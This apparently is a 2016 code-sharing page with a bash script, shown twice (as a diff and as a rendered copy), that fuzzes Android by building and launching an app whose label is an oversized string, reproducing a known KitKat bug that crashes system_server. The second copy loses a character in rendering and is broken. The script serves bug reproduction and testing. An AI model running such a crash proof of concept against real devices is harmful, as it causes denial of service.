k3170makan · October 5, 2016 09:06
diff --git a/AndroidManifestFuzzer b/AndroidManifestFuzzer
 #!/bin/bash
 #Basic set up for an Application AndroidManifest Fuzzer
 #this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
 #this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
 #NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
 #NOTE: you should probably monitor $(adb logcat)||(/system/bin/gdbserver) for responsiveness to the issue

 APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
 APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
 APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME
 ITER=0
 for ((sample_len=251000;sample_len<252000;sample_len+=1000)) #{1000..3000}
 do
 	FUZZ_DATA=`python -c "print 'A'*$sample_len"` #*$sample_len"`
 	echo '<?xml version="1.0" encoding="utf-8"?>
 	 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
 		 package="com.vuln.manifest"
 		 android:versionCode="1"
 		 android:versionName="1.0">
 		 <application android:label="'$APP_LAUNCH_COMP'" android:icon="@drawable/ic_launcher">
 			 <activity android:name="'$APP_LAUNCH_COMP'"
 				 android:label="@string/app_name">
 					 <intent-filter>
 						 <action android:name="android.intent.action.MAIN" />
 						 <category android:name="android.intent.category.LAUNCHER" />
 					 </intent-filter>
 			 </activity>
 		 </application>
 	 </manifest>'  > $APP_PROJ_DIR"/AndroidManifest.xml"
 	echo '<?xml version="1.0" encoding="utf-8"?>
 				<resources>
 	    			<string name="app_name">'$FUZZ_DATA'</string>
 				</resources>' > $APP_PROJ_DIR"/res/values/strings.xml"
 	#cat $APP_PROJ_DIR"/AndroidManifest.xml"
 	echo "[*] {$ITER} (activity->android:label):$sample_len ~ "`cat $APP_PROJ_DIR"/res/values/strings.xml" | wc -c`
 	cd $APP_PROJ_DIR
 	#ant debug install 2>&1 >> /dev/null
 	ant debug install 
 	adb shell am start -n $APP_PACKAGE_NAME/$APP_PACKAGE_NAME"."$APP_LAUNCH_COMP	
 	cd -
 	ITER=`expr $ITER + 1`
 	echo "[*] Launch app and check adblog!"
 	sleep 60
 done
	#!/bin/bash
	#Basic set up for an Application AndroidManifest Fuzzer
	#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
	#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
	#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
	#NOTE: you should probably monitor $(adb logcat)\|\|(/system/bin/gdbserver) for responsiveness to the issue

	APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
	APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
	APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME
	ITER=0
	for ((sample_len=251000;sample_len<252000;sample_len+=1000)) #{1000..3000}
	do
	FUZZ_DATA=`python -c "print 'A'$sample_len"` #$sample_len"`
	echo '<?xml version="1.0" encoding="utf-8"?>
	<manifest xmlns:android="http://schemas.android.com/apk/res/android"
	package="com.vuln.manifest"
	android:versionCode="1"
	android:versionName="1.0">
	<application android:label="'$APP_LAUNCH_COMP'" android:icon="@drawable/ic_launcher">
	<activity android:name="'$APP_LAUNCH_COMP'"
	android:label="@string/app_name">
	<intent-filter>
	<action android:name="android.intent.action.MAIN" />
	<category android:name="android.intent.category.LAUNCHER" />
	</intent-filter>
	</activity>
	</application>
	</manifest>' > $APP_PROJ_DIR"/AndroidManifest.xml"
	echo '<?xml version="1.0" encoding="utf-8"?>
	<resources>
	<string name="app_name">'$FUZZ_DATA'</string>
	</resources>' > $APP_PROJ_DIR"/res/values/strings.xml"
	#cat $APP_PROJ_DIR"/AndroidManifest.xml"
	echo "[*] {$ITER} (activity->android:label):$sample_len ~ "`cat $APP_PROJ_DIR"/res/values/strings.xml" \| wc -c`
	cd $APP_PROJ_DIR
	#ant debug install 2>&1 >> /dev/null
	ant debug install
	adb shell am start -n $APP_PACKAGE_NAME/$APP_PACKAGE_NAME"."$APP_LAUNCH_COMP
	cd -
	ITER=`expr $ITER + 1`
	echo "[*] Launch app and check adblog!"
	sleep 60
	done